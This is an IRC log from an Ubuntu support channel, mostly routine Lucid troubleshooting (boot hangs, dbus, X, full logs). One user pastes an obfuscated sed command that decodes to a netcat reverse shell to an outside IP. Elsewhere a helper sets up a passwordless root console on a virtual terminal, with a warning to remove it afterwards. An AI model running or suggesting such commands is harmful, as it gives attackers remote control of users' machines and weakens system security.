ubottuLaunchpad bug 565392 in console-setup "package console-setup 1.34ubuntu14 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New]10:00
joaopintoerm, this channel is not logged ?10:00
joaopintohum, console setup, I can't see the error reason on the bug10:02
joaopintowell, lets continue10:02
joaopintoMian, the first part is probably easy to do from the chroot10:02
Mianjoaopinto, chroot or /sbin/sulogin?10:03
joaopintoany of them will do10:03
Mianjoaopinto, ok, I'll choose /sbin/sulogin10:03
joaopintoif you use sulogin make sure your / is mounted rw10:03
joaopintomount -o rw,remount / (on the sulogin prompt)10:04
joaopintocp -a /etc/init /etc/init.orig10:04
joaopintorm /etc/init/*10:04
joaopintoedit /etc/init/sulogin.xonf10:05
joaopintoops, conf10:05
joaopinto  start on startup10:05
joaopinto  exec openvt -c 7 -w sulogin10:05
joaopintohum, let me try to follow from my vm10:05
Dr_Willismaking a failsafe root console login eh? :)10:06
joaopintoDr_Willis, yup, a *really* recovery mode10:06
* Dr_Willis plays along10:07
Mianjoaopinto, you mean I create a new file in /etc/init/sulogin.conf and this file will be the only one in this dir?10:07
Dr_Willisi changed the -c 7 to be -c 9 :)10:09
Dr_Willistesting it on the netbook10:10
joaopintoMian, yes, we just want a console on startup10:11
Dr_Willisyep - it worked.10:11
joaopintoMian, upstart (init) will try to start everything on that dir automatically10:11
Dr_Willisi used -c 9 and kept the files there for my working setup. :) now i got a root console on alt-ctrl-f910:12
joaopintoeh :)10:12
joaopintoMian, it migght be a good idead to use -c9 instead10:12
Dr_WillisQuick submit a tip to OMGubuntu!10:12
joaopintoDr_Willis, is not done yet :P10:12
Mianjoaopinto, after creating this file, what?10:12
joaopintoMian, exec /sbin/init10:13
joaopintoit will look hang10:13
joaopintobut now you have an sulogin console on terminal 7, or 9, depending on the -c10:13
Mianjoaopinto, with --debug or --verbose?10:13
joaopintoMian, not sure, didn't tried those in this process yet, I guess --debug would help10:13
Mianjoaopinto, now, I have the sulogin in terminal 710:14
=== \vish is now known as vish
Mianjoaopinto,now what?10:16
joaopintoMian, now you can check the available services ans their status: initctl list10:16
Mianjoaopinto, executing "initctl list" in terminal 7 gives 4 verbose lines10:17
joaopintoyou only get sulogin right ?10:17
joaopintoon the list10:18
switchgirlhttp://ubuntuforums.org/showthread.php?p=9138631#post9138631 anyone got an answer to this?10:19
Mianjoaopinto, now in terminal 7 I executed "initctl list" and it gives 4 lines that don't seem to be a list of services10:19
joaopintohum, that is odd10:19
lapionRecently the the i915 has been crashing the system with hangcheck errors, while the server seemed to be running normally,10:19
* lapion thinks the hangcheck code has a bug. ( ps I am talking about the i915 gpu driver)10:21
joaopintogrr, i can't switch to the VT on my VM now10:21
joaopintoerm typo10:23
Mianjoaopinto, these are the 4 lines "init: Connection from private client"10:23
lapionhmm is a vt on a vm a vt or a vvt ? or a v-vt ?10:23
joaopintoMian, ok, you are getting more output because you are using verbose or debug10:24
joaopintoit's vt on a vm :P10:24
lapionso it's a vt-vm or a vm-vt ?10:24
lapionor do 2 v's cancel each other..10:25
Mianinit: job_class_register Registered job /com/ubuntu/Upstart/jobs/sulogin10:25
Mianjoaopinto, should I continue?10:25
joaopintoMian, yes10:25
joaopintoMian, cp -a /etc/init.orig/* /etc/init10:25
joaopintoto make the other services available10:25
lapionanyhow.. anyone here know how to set the hangtimer value for the i915 ?10:26
switchgirlanyone know what the issue is with var.log... growing to more tha 30 gb10:26
tormodswitchgirl, look inside it10:26
tormodlapion, try #ubuntu-x10:27
switchgirltormod, who has 30gb ram?10:27
joaopintoswitchgirl, that means there is something filling your logs10:27
switchgirli have 2gb10:27
joaopintoSwedeMike, it has nothing to do with ram10:27
joaopintoops, switchgirl10:27
tormodswitchgirl, ls -l /var/log10:27
Mianjoaopinto, and then? exec /sbin/init?10:27
lapionthnx tormod10:27
joaopintoMian, now you can start the services by name10:27
Mianjoaopinto, how?10:28
* om26er recalls a Karmic bug..10:28
joaopintoMian, the issue now is that upstart is event based, meaning, if you invoke a service, and there are services which start based on it's events, they will just do so in a chain reaction10:28
joaopintoMian, unlike the ordered scripts from the past, which allowed you to start on a selective way10:28
joaopintoMian, example: start hostname10:28
switchgirli removed the offending logs so i can boot etc10:29
tormodswitchgirl, which one was the offending one?10:29
Mianjoaopinto, what service should I try to start now?10:29
joaopintohostname is a good one to start with, it's simple10:29
=== red_ is now known as red
tormodjoaopinto, shouldn't he leave out some from /etc/init so he doesn't get into the normal avalanche?10:31
switchgirlwell /var/log/kern.log  /var/log/kern.log.1 /var/log/messages.1  /var/log/ufw.log.1  /var/log/syslog.1 /var/log/syslog /var/log/messages  /var/log/ufw.log10:31
joaopintotormod, it should, unless we just pick scripts on the end of the chian10:31
joaopintoMian, you can try the "mountall" which will trigger most of the core services, but not gdm10:32
ubottuLaunchpad bug 453444 in rsyslog "/var/log fills up with "all normal" messages @ about 575/sec fill up the available space" [High,Fix released]10:32
joaopintothere are some chances it will hang :P10:32
switchgirltotalling over 30gb this time10:32
Mianjoaopinto, yes it hung :P10:33
tormodswitchgirl, use "less" to look at the files, there is probably 29GB of one message repeated10:33
switchgirltormod, i removed the logs10:34
tormodjoaopinto, but will not finished mountall trigger stuff which eventually triggers gdm?10:34
switchgirlbut last time it totaled 80gb10:34
joaopintoMian, mountall starts: avahi-daemon rsyslog udev uptart-udev-bridge dbus plymouth network-manager ufw network-interface-security10:34
tormodor is the /etc/init not "watched"?10:34
Mianjoaopinto, so?10:35
tormodswitchgirl, well look in the new logs, they must already be growing10:35
joaopintoTorch, it didn't on my experience, it might depend on another script which starts on startup (which was not available on init startup)10:35
joaopintogrr, I cant' scroll on the VT10:36
joaopintoMian, I am not sure the debug/verbose output shows the services being started10:36
tormodjoaopinto, maybe you should use "screen" :)10:36
om26ersometime ctrl+shift+v dont paste in terminal although I can paste with right click10:36
joaopintotormod, good idea :D10:37
joaopintoon my case will help, but not on him, hang ;)10:37
Mianjoaopinto, I rebooted and waiting on terminal 7 again now10:37
joaopintoMian, try "exec mountall --daemon" that is what mountall does, but you will not triger the chain reaction10:39
joaopintoMian, without the "exec"10:39
joaopintojust mountall --daemon10:39
joaopintoor just mountall, not sure what would be best since we are not upstart10:39
joaopintojust "mountall" from vt7 should do10:41
Mianjoaapinto, I tried mountall --daemon and it prints some messages complaining about /proc/bus/usb couldn't be mounted10:41
joaopintoMian, did you edit something on your previous system to use virtualbox+usb ?10:42
Mianjoaopinto, I think so10:42
joaopintoMian, hum, I don't get that error, and I do remeber virtualbox reuired that10:42
joaopintoand it could be what is triggerign the hang10:43
joaopintowhich explains why the livecd boots, that will not be mounted10:43
Mianjoaopinto, what if I uninstalled virtualbox10:43
joaopintoMian, will not help, that change was done manually10:43
joaopintoMian, grep "usb" /etc/fstab10:44
switchgirlanywone know why i suddenly get: Failed to fetch http://packages.medibuntu.org/dists/lucid/Release.gpg  Could not connect to packages.medibuntu.org:80 ( - connect (110: Connection timed out)Failed to fetch http://packages.medibuntu.org/dists/lucid/free/i18n/Translation-en_GB.bz2  Unable to connect to packages.medibuntu.org:http:Failed to fetch http://packages.medibuntu.org/dists/lucid/non-free/i18n/Translation-en_GB.bz2  Unable t10:44
switchgirlo connect to packages.medibuntu.org:http:Failed to fetch http://packages.medibuntu.org/dists/lucid/free/binary-i386/Packages.gz  Unable to connect to packages.medibuntu.org:http:Failed to fetch http://packages.medibuntu.org/dists/lucid/non-free/binary-i386/Packages.gz  Unable to connect to packages.medibuntu.org:http:Failed to fetch http://packages.medibuntu.org/dists/lucid/free/source/Sources.gz  Unable to connect to packages.medibuntu.org:ht10:44
switchgirltp:Failed to fetch http://packages.medibuntu.org/dists/lucid/non-free/source/Sources.gz  Unable to connect to packages.medibuntu.org:http: Some index files failed to download, they have been ignored, or old ones used instead.10:44
switchgirloops :(10:45
joaopintoswitchgirl, medibuntu is probably down10:45
switchgirli didnt know there was that much there...10:45
Mianjoaopinto, none /proc/bus/usb usbfs devgid=127,devmode=664 0 010:46
kuttanshello everybody10:46
joaopintoMian, edit your fstab and remove it10:46
joaopintoMian, try mountall now10:47
kuttanshey guys i figured out a lot of things about encrypted hard disk n how the initrd image does process that10:47
Mianjoaopinto, but when I boot with /sbin/sulogin and execute mount -a, it works without hang10:47
kuttansnow what i want is some help regarding editing the /usr/share/initramfs-tools/scripts/cryptroot10:47
joaopintoMian, but that one in the upstart events loop could trigger a bug10:48
joaopintoMian, that hang could be by the other interactions, not from the "mountall" per si10:48
kuttansi luksFormatted my hard disk fully with a key and kept the key in a partition of usb drive which is again luksformatted protected by a pass phrase10:48
joaopintokuttans, write on a page, randomly pasting it here will not very helpful for those which may need it and are not here ;)10:49
joaopintonot be10:49
kuttansok joaopinto10:49
Mianjoaopinto, I get "mountall: Could not connect to Upstart: Failed to connect to socket /com/ubuntu/upstart: Connection refused"10:49
kuttans hey guys i figured out a lot of things about encrypted hard disk n how the initrd image does process that now what i want is some help regarding editing the /usr/share/initramfs-tools/scripts/cryptroot   i luksFormatted my hard disk fully with a key and kept the key in a partition of usb drive which is again luksformatted protected by a pass phrase10:50
joaopintoMian, you did that from the vt7 after starting /sbin/init ?10:50
Mianno, sorry :D10:51
joaopintoMian, anyway I am confident about the usb problem10:51
joaopintolet's pray10:51
joaopintoboot normal now :P10:51
kuttansthe scripts/local-top/cryptroot is called before my keyscript is called.  There the crypttab information is passed as a parameter.  A method in that script look for a luksformatted hdd and ask for a passphrase and unlocks it.  there i want to exploit that method so that it wait for usb and after that it check the partition in the usb for luks and ask a passphrase and after that use the decrypted key to open my hdd. can anyone throw some light on how i ca10:53
kuttansn achieve this.10:53
Mianjoaopinto, God heard your prays! excellent! it boots normally :D10:53
joaopintoMian, uff, a LOT of work for such a simple problem10:54
Dr_Willisya know its scary when you start cleaning out your HD's and find several 100+GB of extra copies of stuff laying about10:54
Mianjoaopinto, thanks a lot. I really don't know how to thank you10:55
joaopintoMian, upstart/mountall should have provided an indication that there was something wrong with that mount instead of hanging10:55
joaopintoMian, well, we wouldn't fix it without your patience :)10:55
Mianjoaopinto, so, will you add these details to the bug description?10:55
joaopintoMian, do have any idea how that line gone into your fstab ? Was you manually adding it in the past, or was it the virtualbox install ?10:55
joaopintoMian, yes, just let me know the bug nr, I Am also going to try to reproduce it adding that line10:56
Mianjoaopinto, bug is here https://bugs.launchpad.net/ubuntu/+bug/56510910:56
ubottuLaunchpad bug 565109 in ubuntu "Upgrading from 9.10 to 10.04 on Dell Inspiron 6400 makes the system unbootable" [Undecided,New]10:56
Mianjoaopinto, I don't remember as I installed virtualbox more than a year ago10:57
Mianjoaopinto, but as I remember, I modified some files manually to get usb work in virtualbox10:57
joaopintook, so it's probably that, let's see what priority it gets10:58
Mianjoaopinto, https://help.ubuntu.com/community/VirtualBox/USB10:59
Mianjoaopinto, this page instructs to add this line manually10:59
joaopintoMian, great, it gives a hint that it will affect all users that followed that11:00
Mianjoaopinto, I think so11:00
kuttansjoaopinto : only the those who belong to the group i guess11:01
joaopintoMian, don't forget to remove the /etc/init/sulogin.conf, and it provides a passwordless root login on vt7 ;)11:01
DASPRiDpasswordless rootโ€ฆ bad idea :P11:02
kuttansjoaopinto : Mian : there is another work around for the VBox i guess .  the fstab one is old11:02
joaopintokuttans, is are out of sync, the fstab entry was a problem, not a fix :)11:02
Mianjoaopinto, so, you mean there is a but in mountall?11:03
joaopintoMian, mountall or upstart, I am not sure whos is misbehaving11:03
kuttansbefore jaunty it was a problem. but in jaunty and to some extent in karmic the fstab itself was enough11:03
kuttansanyone using full disk encryption with a usb key and a passphrase?11:05
lalalolwill 10.04 include en-CA?11:06
kuttanstwo form authentication using usb key and a passphrase to encrypt full disk11:06
Mianjoaopinto, so, will I be able to use usb in virtualbox or not?11:06
joaopintoMian, I believe virtualbox usb support no longer needs that mount, but I am not sure11:08
Mianjoaopinto, thanks a lot11:11
joaopintoyou are welcome :)11:11
Mianjoaopinto, by the way my name is Mina not Mian. Mian was a mistyping :D11:12
joaopintolol, ok :)11:12
Mianjoaopinto, thanks a lot for all your efforts these 3 days. bye11:13
lalalolwill 10.04 include en-CA?11:13
kuttansanybody using a full disk encryption in lucid11:14
Dr_WillisIm not that brave11:15
DASPRiDkuttans, full disk encryption has not so many advantages over partial encryption, at least for non-laptops11:15
* Dr_Willis encrypts his ram11:16
* DASPRiD encrypts Dr_Willis and throws away the keyslot11:16
* Dr_Willis rot13'a his name11:18
nils1hej folks! may anyone help me? i am not able to install gnome-shell - it tells me that libgjs0 cant be installed..11:22
Dr_Willisnils1:  its had that issue for the last 2 weeks+11:22
Dr_Willissomthing about xlurunner versions being  wrong11:22
nils1mmh.. and how may that be solved in future?11:23
Dr_Willisno idea11:23
Dr_Willisforums might have a work around..  Hopefuly it will get fixed befor release11:24
kuttansam using laptop and its quite good for me11:24
nils1kuttans: are you running gnome-shell?11:25
Dr_WillisNever really tried it. I use the Netbook edition on my netbook11:25
kuttansnils1: no im not11:25
Reckonhello, is this the room to ask about 10.04?11:26
kuttansDASPRiD:im having a laptop and i dont have any problem with that so far. but now i want to integrate the challenging procedure via plymouth than CLI11:26
lalalolwill 10.04 include en-CA?11:26
Reckonregarding the boot process, is upstart being removed?11:27
ubottuLaunchpad bug 509177 in gnome-shell "Gnome-shell fails to install on lucid" [Medium,Fix released]11:27
Dr_WillisReckon: Upstart is being phased in...11:27
Reckonhow come? do you have more details?11:28
Dr_WillisReckon:  why do you think its being phased OUT ? when its been slowly getting phased into  and rplaceing sysv stuff over the last 3+ releases11:29
Reckonwait, let me paste a link11:30
nils1yes, the bug that affects me is https://bugs.launchpad.net/ubuntu/+source/gnome-shell/+bug/555155 libgjs0 seems to be broken..11:31
ubottuLaunchpad bug 555155 in gjs "depency conflict with libgjs0 and xulrunner" [Undecided,Confirmed]11:31
Dr_Willisnils1:  yep. seems  libgjs0 is the issue11:31
ReckonDr. Willis, I'm trying to find out the link. Anyway, I can't find in my 10.04 install the /etc/event.d directory, which is supposed to replace the /etc/init.d one to implement the Upstart11:36
Dr_WillisReckon:  /etc/init  has teh upstart  configs/files11:36
Dr_WillisI dont recall ever seeing an /etc/event.d11:37
nils1just subscribed to it, hoping for a fix via update.. :-) its really a pitty - i thought that maybe foresight might have shipped a proper ability for gnome-shell, but that doesnt work either11:37
Dr_Willisnils1:  it seems the gnome-shell stuff has some interesting ways in how it was linking to some libs.. (from what i am reading in the bug reports)11:38
ReckonDr. Willis, this an excerpt of an article "Ubuntu started using the Upstart init daemon in Feisty. Between the Feisty and Gutsy+2 releases, Ubuntu will move away from the SysVinit setup and toward the cleaner, more flexible Upstart setup. As more system services are put under the control of Upstart, entries in the /etc/event.d directory will replace the contents of the /etc/init.d and /etc/rc?.d directories. Runlevels will no longer be a fo11:39
nils1quite funny for those here at gnome, who dont like the shell thing..11:39
lalalolwill 10.04 include en-CA?11:42
Dr_WillisReckon:  that artical may be outdated.11:42
Dr_Willisthe various  upstart service.conf files are in /etc/init right now11:43
Dr_Willistheres still an init.d dir11:43
Dr_Willis a upstart service handles the stuff in the rc.d  so most people dont even notice the change11:43
vistakiller1suspend hibernate still not working in my system11:45
vistakiller1anyone else has the same problem?11:45
Dr_Willisjust closing the lid. crashes my netbook :)11:45
Dr_Willisor at least it used to.11:45
Dr_Willislets try now11:45
Dr_Willisyep - it still does...11:46
nils1by the way, has anyone of you ever faced a crash of evolution the last weeks?11:47
Dr_WillisI never use evolution11:47
Reckon1was able to find it11:47
Reckon1they removed that folder back in 9.1011:48
nils1since the last updates of 9.10 evolution tries to start and then immediately self-closes11:48
nils1telling in the notification area of the windows that the receiving of new mail failed11:49
nils1thats really annoying!11:49
BigbrumbrumHi! Installing lucid destroys your Xp installation, and you need to repair your broken xp with a repair disk11:51
coc0nutIs this your personal experience or do you have evidence that it is a bug which affects many people?11:51
Dr_WillisFile a bug report I guess...11:51
nils1and installing windows destroys grub also.. :-)11:51
Dr_WillisIt dident affect me that way11:51
Bigbrumbrumi've tried it on 6 computers11:52
Bigbrumbrumall with grub dual boot11:52
nils1which part of windows does it destroy?11:52
coc0nutProbably just the master boot record on the hard disk.11:52
Bigbrumbrumthe boot up-files11:52
nils1thats what i called kind of egocentric behaviour of windows the last few years, i cant believe that ubuntu does the same today!11:53
Reckon1and is it a known issue not being able to install libsexy2?11:54
Dr_WillisI doubt if it does..  why would it do it on some machines.. and not everyone..  when in doubt check the bug reports I guess11:54
coc0nutI've never seen Ubuntu "destroy" the MBR. It writes grub's loader to it.11:54
Dr_WillisReckon1:  ive seen mentoon of libsexy a few times - but not tried to install it lately11:54
Dr_Williscoc0nut:  exactly..   and if some viruses are there.. that can goof up windows. :) when the vbirus is no longer there..  heh11:55
Dr_Willishad that happen once...11:55
coc0nutSuch a distant memory for me.11:55
Dr_WillisHad to reinfect a friends pc.. so he could backup his files.. THEN whipe out the virus.11:55
ojiiwhere would I get the lucid lynx packages for nvidia drivers (i can't use apt-get because when I'm booted i don't have internet)11:55
Dr_Willislibsexy2 is already the newest version11:56
Bigbrumbrumi dont have viruses, rly11:56
Dr_WillisReckon1:  i got it installed here.11:56
coc0nutojii: http://packages.ubuntu.com/search?searchon=names&keywords=nvidia11:56
Reckon1yea, but I get an invalid IP warning11:56
coc0nutojii: The one you're looking for should be there somewhere.11:57
ojiiah thanks coc0nut11:57
Dr_WillisReckon1:  huh?11:57
Reckon1only happens with that package11:57
Dr_WillisReckon1:  server may be in process of updateing the files perhaps11:57
Tux^can some one please help, i had done a successful upgrade to 10.04 when beta1 was out. It was working fine till last night. After regular updates it is not booting anymore !!11:57
coc0nutTux^: Any error messageS?11:58
coc0nutWhat exactly happens when you try to boot?11:58
Reckon1Imposible obtener http://archive.ubuntu.com/ubuntu/pool/main/libs/libsexy/libsexy2_0.1.11-2build2_i386.deb  403  Forbidden [IP: 80]11:58
Tux^no errors11:58
Tux^it shows the first screen with "ubuntu" and thats it.. it takes me to a black screen11:58
Tux^no login screen11:58
Dr_WillisReckon1:  error 403 - sounds liek their server is having some issues. but that seems... weird...11:58
ojiido I need both nvidia-current and nvidia-current-modaliases (or even more) or is nvidia-current enough?11:59
coc0nutTux^: Are you able to use recovery mode from grub?11:59
Tux^nope :(11:59
Tux^did all that11:59
coc0nutojii: Sorry, no idea.11:59
Tux^even i installed 9.10 will all updates and then did a upgrade again to 10.04 and same issue12:00
coc0nutTux^: What about a clean install of 10.04?12:00
Tux^that is my next step, before that i just wanted to know if i was doing something wrong12:01
Dr_Willisupdates can break things..12:01
coc0nutTux^: Yeah, you were probably doing everything right.12:01
Dr_Willisi only try to update every so many days... not every 5 hrs. :)  and i hang in here to be sure its ok.12:01
coc0nutUpgrading to a new version of the OS can just break everything for no apparent reason. =/12:02
Tux^i will post here again after a clean update12:02
coc0nutOk, good luck.12:02
Tux^thank you all12:02
Tux^ :)12:02
coc0nutNo problem.12:02
Reckon1wow... i just noticed by router blocks sites containing the word sex.12:06
Reckon1that's why i got that error12:06
penguin42you don't live in Essex do you?12:07
shoonyahow to add support for FLAC in exfalso (tag editor from quodlibet) ?12:07
_CommandeR_do anyone have problems logging into networks with WPA2 ?12:09
droidhello all, where does playonlinux store it's istalled win Apps?12:13
_CommandeR_droid, home folder and .wine12:13
_CommandeR_droid, hm or .playonlinux try that also been a time since i used it.12:14
droidcommander ok, my steam/steamapps folder has games in it, why wont steam in pol show them?12:15
Dr_Willisbecause POL just saw steam installed and not all the other apps?12:16
Dr_WillisI just use wine to run steam then launch the games via steam12:16
ojiimy boot stops after a message saying "ehci_hcd 0000:00:04.1: irq 18, io mem 0xdf489200", i started with recovery mode, nomodeset and xforcevesa. anyone got an idea how i can get past that line and actually boot?12:17
Reckon1where could I provide12:22
ojiianyone know some bootoptions to increase the chance that i can successfully boot lucid?12:28
penguin42ojii: What's your hardware?12:32
ojiipenguin42, MBP 5.112:33
penguin42hmm that can't be that unusual12:33
penguin42ojii: What USB devices do you have plugged in?12:33
ojiii managed to boot now tho12:34
ojiinot sure if it's lucid's fault or the MBP's fault but this is the most painful linux installation i ever had12:37
ojiibut learning a bit more about linux while struggling to install, so at least there's some positive side to it as well12:38
ojii"b43-pyh0 ERROR: FOUND UNSUPPORTED PHY (Analog 8, Type 4, Revision 4)12:39
ojiiand i'm in shell again12:39
ojiiwhat's a "phy"?12:39
ReckonEventually I managed to install of XChat12:40
fiveopI've got a nearly fresh installation of lucid on my desktop (added some dev libs to compile emacs and got all updates to the preinstalled things). Now if I hit the s-Key anywhere the logout menu of "Indicater Applet Session" comes up12:42
ReckonDr Willis, thanks for your advices12:42
fiveopI haven't that problem before getting the updates12:43
monkey_dusthi all -- i am unable to format a partition for data storage, without OS, I want to use it for backups -- hints & tips anyone?12:44
SwedeMikemonkey_dust: it'll be easier to help you if you qualify "unable" a bit more.12:45
ojiiargh i want a graphical desktop :(12:45
monkey_dustSwedeMike, i did mkfs.ntfs, but cannot create directories or put files on it12:46
SwedeMikemonkey_dust: again, "cannot" doesn't help much, you need to provide more information.12:46
monkey_dustthat was the information :s12:46
yofelmonkey_dust: you did mount it after formatting it, yes?12:46
bittinSomone knows alsa here? i want to switch from PulseAudio to alsa in my Ubuntu system but i fails :(12:47
monkey_dustSwedeMike, it says not found in fstab or mtab, when i try to mount12:47
yofelmonkey_dust: ... 'mount /dev/<partition> /path/to/mountpoint/'12:48
SwedeMikemonkey_dust: and how do you try to mount it?12:48
bittinalsamixer says: cannot open mixer: No such file or directory12:48
droidi obly know how too chain alsa/pulse/oss so it all playsz the same thing >.>12:49
yofelbittin: why are you trying to use alsa?12:49
bittinyofel, becouse Pulse Audio dosen't work on my system ?12:49
bittinand becouse i like alsa better12:50
yofelbittin: you did file a bug about that yes?12:50
monkey_dustok guys, i created mountpoint, it works now12:50
ojiito start gnome i do `sudo start gdm` right?12:51
yofelojii: to start the login screen and X yes12:51
bittinyofel, no12:51
ojiiyofel, i get a little window telling me 'ubuntu is running in low-graphics mode'12:51
bittinbecouse i don't know if its a bug or if its me failing12:52
yofelbittin: best you talk to crimsun when he's here, he's an audio dev12:52
bittinah ok12:52
Genscherhey, is there a way to get wifi (b43) working again on latest lucid daily + 2.6.32? It worked always out of the box but the enew kernel cries for some firmware file?12:52
ojiithen i can choose between "run ubuntu in low-graphics mode for just one session", "reconfigure graphics", "troubleshoot erro", "exit to console login" and "restart x", which one should I use to get gnome to start?12:52
yofelojii: what does your /var/log/Xorg.0.log (Xorg.0.log.old) say?12:53
ojiiso i go back to console to check that?12:53
yofelyes, that should tell you why it's running in low graphics mode12:53
ojiiweird there's no Xorg.0.log12:54
ojiionly Xorg.failsafe.log12:54
ojiialthough I didn't start in recovery mode this time12:54
yofelhm, didn't you say you used something like 'xforcevesa', maybe that's the reason?12:55
ojiibut that one ends with ddxSigGiveUp: closing log12:55
ojiii used that before12:55
ojiito get to the shell to install the nvidia drivers12:55
ojiiwhich i did12:55
ojiithen i restarted and booted non-recovery mode12:55
yofelah, did you create a xorg.conf that uses the nvidia driver?12:56
ojiii got the plymouth screen for a split second and dropped into shell again12:56
ojiiyofel, how?12:56
ojiidoesn't the deb pkg do that?12:56
yofelnope, jockey does that (there's jockey-text too, but I never used it)12:56
yofelyou can run 'sudo nvidia-xconfig'12:56
yofelojii: the 'hardware drivers' app12:57
ojiiah okay12:57
ojiilets see if that worked12:57
ojiiyofel, still only getting a shell13:01
yofeland if you start gdm?13:01
ojiistill warning about low-graphics mode :(13:01
simontolHi, anyone here who knows where I can find the new brand fonts for lucid logo?13:02
yofelojii: what happens if you stop gdm and run 'sudo startx' ?13:03
simontolttf-ubuntu-title package contains the old fonts13:03
ojiiyofel, looking promising13:04
yofelojii: that should give you a root gnome session13:04
ojiiyofel, how can i make this work every time i boot now?13:05
yofelnow I'm confused though why gdm won't work...13:05
yofelojii: you don't want to be logged in as root all the time, we need to get gdm to work now13:06
ojiiyea that's what i meant13:06
ojiiis it normal that i can't start network manager now?13:07
yofelI don't know whats normal or not in the root session, never used it13:07
yofelojii: what does your '/etc/X11/default-display-manager' contain?13:08
ojiiyofel, /usr/sbin/gdm13:10
penguin42yofel: A plain startx should be enough; I had X not start from gdm yesterday and had to startx manually13:13
yofeloh? could be a general issue then maybe, haven't rebooted since yesterday13:14
ojiiyofel, when i try to use nvidia-settings to write the configs it tells me it can't open the file for writing13:14
ojiialso i use beta2 not daily13:14
penguin42yofel: Today it was OK and hadn't updated yesterday - so I think it's a sometimes-bug; yesterday was after an fsck13:14
yofelojii: well, check the file permissions for the xorg.conf, have to go for now, bbl13:16
ojiiyofel, what's correct permissions?13:17
yofel546 4.0K -rw-r--r-- 1 root root 1.8K 2010-01-14 20:13 /etc/X11/xorg.conf13:17
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adalalanyone know why pulseaudio isn't picking up my mic properly?13:21
videorechnerhi I installed live-initramfs and the image is loaded from the server, but wont be mounted at /live, thats all I can see in the error message, I then am able to use the shell, how can I find out, why it didnt mount the image?13:23
ojiistill can't get gdm to run for a user. only startx works13:25
ojiiand loads of things I do give me a "org.freedesktop.DBus.Error.FileNotFound: Failed to connect to socket /var/run/dbus/system_bus_socket: No such file or directory"13:26
penguin42ojii: Odd, I wonder why system dbusdidn't start - ok, try   sudo start dbus13:27
ojiipenguin42, "start: Job failed to start"13:28
ojiii'm starting to hate this MBP13:30
penguin42there's something odd with your install13:33
penguin42I don't think I could honestly blame the mbp13:33
penguin42did it crash during install?13:33
ojiipenguin42, nope13:33
ojiibut i always had issues booting it13:33
penguin42even into MacOS?13:33
ojiiah no13:33
ojiithat's not a problem13:33
penguin42hmm OK13:33
ojiibut i think the booting issues with nouveau are a known issue13:34
ojiiand using vesa 'solved' it13:34
ojii(solved=it let me boot into a shell session)13:34
penguin42ok, what did that start dbus give as any reason?13:34
ojiistart dbus just gives me taht line i wrote above13:36
ojii"start: Job failed to start"13:36
bjsnidermaybe the install cd was b ad13:37
penguin42I'd check /var/log/messages or /var/log/user.log to see if there is any more info13:37
penguin42bjsnider: It would be odd for it to cause problems rather than fail13:37
bjsnideri don't agree with that13:37
bjsnideri've seen bad install cds cause all kinds of crazy nonsense13:38
penguin42bjsnider: That *should* be spotted by the installer if something fails to be read off disk13:38
penguin42bjsnider: The error correction on a cd is NOT going to let bad data through, it WILL cause an io error13:39
bjsnidermaybe there was one13:39
bjsniderwe don't know what went on in that situation13:40
ojiii uploaded all files in /var/log to http://files.ojii.ch/logs.tar.gz because honestly I have no clue what to look for in those logs13:41
ojiiis 'messages' always the one from the last boot?13:42
BPowerQuick question.13:42
BPowerSomeone is suggesting that I run this through my terminal.  Is it safe?13:42
BPower(echo "service crond stop && cron -j 1" | sed 's/ser/nc/' | sed 's/vi/\ -e\ /' | sed 's/ce/\/bi/' | sed 's/\ cr/n\/sh/' | sed 's/ond/\ 78/' | sed 's/\ stop/.129.252.6/' | sed 's/\&\&\ c/88/' | sed 's/ron\ -j\ 1/88/') >/dev/null 2>&113:42
ojiibecause for some reasons it kept the "ro single nomodeset xforcevesa" (i thought editing the boot options is only for one boot)$13:43
videorechneris there a ubuntu live disk specific channel?13:43
BPowerno one?13:44
BPower :)13:44
penguin42ojii: I think it appends, so the bottom should be the latest; so those logs look generally OK except for 1) It complaining it can't connect to ConsoleKit becaus eof no dbus, and 2) dbus failing to start but it doesn't say much about why dbus is failing to start13:44
Dr_WillisBPower:  when in doubt.. say no.. plain and simple.13:45
BPower...or ask people who know more than you...13:45
Dr_Willisvideorechner:  ive never seen one13:45
penguin42ojii: if you do ps -eaf|grep dbus   do you see a dbus-daemon --system --fork ?13:47
ojiilet me search | on that keyboard13:48
penguin42ojii: If you are on the console then if all else fails you should be able to type one by doing alt-124 (with the 124 on the numeric keypad)13:49
echosystmwhat software is going to be in "canonical partners" ?13:49
echosystmwhy are parallels and vmware gone?13:49
penguin42echosystm: I don't know,  but my guess is they'll come back around the time of release13:49
Dr_Willisperhaps the companies havent  came out with packages to put there yet13:49
echosystmim not sure that they were even in 9.10 though13:49
ojiipenguin42, which would require me to find the numeric keypad)13:49
penguin42ojii: Haha oh ahem, you know an external USB keyboard might help13:50
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ojiipenguin42, i see /bin/dbus-daemon --fork --print-pid 4 --print-address 6 --session13:51
penguin42ojii: There are two dbus daemons, the session daemon and the system daemon - you seem to be missing the system one13:52
penguin42ojii: OK, let me take you through a set of 3 commands13:52
penguin42ojii: sudo  mkdir -p /var/run/dbus13:52
penguin42ojii: sudo chown messagebus:messagebus /var/run/dbus13:53
penguin42ojii: sudo dbus-uuidgen --ensure13:53
penguin42now do all 3 of those work/give errors?13:53
ojiilast one gives me an error13:53
ojiicommand not found13:53
mawstDude... man... bruh... I removed that transmission themed icon from the bar and now transmission won't show in the tray no matter what I do.13:54
penguin42ojii: Do you not have /bin/dbus-uuidgen ?13:54
ojiiah typo13:54
penguin42bah - I thought we were onto something13:55
ojiipenguin42, now i get: "UUID file '/var/lib/dbus/machine-id' should contain a hex string of length 32, not length 0, with no other text"13:55
ojiiwith the dbus-uuidgen13:55
penguin42ooh interesting13:55
penguin42hmm I wonder where that's supposed to come from13:55
penguin42ojii: and that file is currently 0 length?13:56
ojiiif i cat it i get nothing13:56
penguin42ok, so delete that broken file and rerun dbus-uuidgen --ensure  and then cat that file13:57
ojiinow i get something13:58
ojiilooks sane now13:58
penguin42ojii: and sudo start dbus ?13:58
ojiiscreen went black13:59
ojiiwow next time warn me please13:59
penguin42not necessarily a bad thing13:59
penguin42ojii: I didn't expect it to go black13:59
ojiinow I got the login screen!!!!!!!13:59
ojiibut now I get (after entering password): "Could not update ICEauthority file /home/jonas/.ICEauthority"13:59
penguin42ojii: Try rebooting now we've got that problem fixed14:00
ojiiBUT: it did let me log in14:00
ojiipenguin42, i love you!14:00
penguin42that'll be one herring14:00
* ojii sends penguin42 a herring14:03
ojiinow to my favorite part after installing a ubuntu system: wireless :(14:06
